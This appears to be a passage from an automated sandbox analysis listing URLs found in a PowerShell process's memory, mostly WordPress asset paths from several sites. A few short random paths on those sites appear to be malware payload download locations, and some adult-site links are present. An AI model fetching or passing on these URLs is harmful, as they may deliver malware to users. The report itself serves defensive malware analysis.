Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp | String found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/xmlrpc.php
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.comx
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.2218306203.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.cs
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kre
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tra
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.uti
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/acurax-social-media-widget/css/style.css?v=3.2.10&#038;v
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/awsm-team/css/team.min.css?ver=1.2.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/awsm-team/js/team.min.js?ver=1.2.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/ea-style.css?ver=2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/font-awesome.min.c
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.9
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.0.9
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mi
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.0.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.0.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.0.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/assets/fontawesome/css/all.min.css?v
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/assets/js/dismiss.js?ver=1609898690
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/blocks.style.build.css?ver=160989868
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/css/frontend.mi
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend.min
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/rocket-lazy-load/assets/img/youtube.png)
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/simple-download-monitor/css/sdm_wp_styles.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/simple-download-monitor/js/sdm_wp_scripts.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css?ver=5.2.4
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js?ver=5.2.4
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js?ver=3.8.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/css/style.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/inc/video-js/video-js.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/inc/video-js/video.js
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/inc/video-js/vjs.youtube.js
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/plugins/wp-video-posts/js/wpvp-front-end.js
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/style.min.css?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/magnific-popup.min.css?ver=1.0.0
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/simple-line-icons.min.css?ver=2.
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/third/slick.min.css?ver=1.6.0
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/fonts/fontawesome/css/all.min.css?ver=5.15
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/main.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/html5.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/lightbox.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/magnific-popup.min.js?ver=2.0.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/global.css?ver=1609897380
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/post-102734.css?ver=1609897376
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/post-102751.css?ver=1609897384
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-content/uploads/elementor/css/post-103233.css?ver=1609897381
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/css/dist/block-library/theme.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/j
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2219130690.000000000297B000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/cc.main.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/cargo/bt_elements.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/js/jquery.datetimepicker.full.min.j
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/main.min.css?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/js/wpcargo.js?ver=6.7.4
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/gfx/plug.png);
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/dir.hover.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/fancySelect.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/misc.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/js/wp-embed.min.js?ver=5.6
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.2218306203.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://anybunny.mobi/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://arabysexy.mobi/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 00000005.00000002.2223573753.0000000003C23000.00000004.00000001.sdmpString found in binary or memory: https://d-cem.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmpString found in binary or memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://d-cem.comp
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/analyticsjs/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://dirtyindianporn.info/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://freejavporn.mobi/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpString found in binary or memory: https://gmpg.org/xfn/11
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://go-indian.pro/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://hindiporn.pro/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://hotindianporn.mobi/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpString found in binary or memory: https://i.ytimg.com/vi/ID/hqdefault.jpg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://indianpornmovies.info/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://kashtanka.tv/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-program
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respond
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/about-us/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/author/admin/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/category/eating-keto-style/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/category/food-receipes/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpString found in binary or memory: https://ketoresetme.com/category/health/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-cookbook/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-diet/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-news/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-summit/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/weight-loss/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/contact-us/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/feed/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/privacy-policy-2/
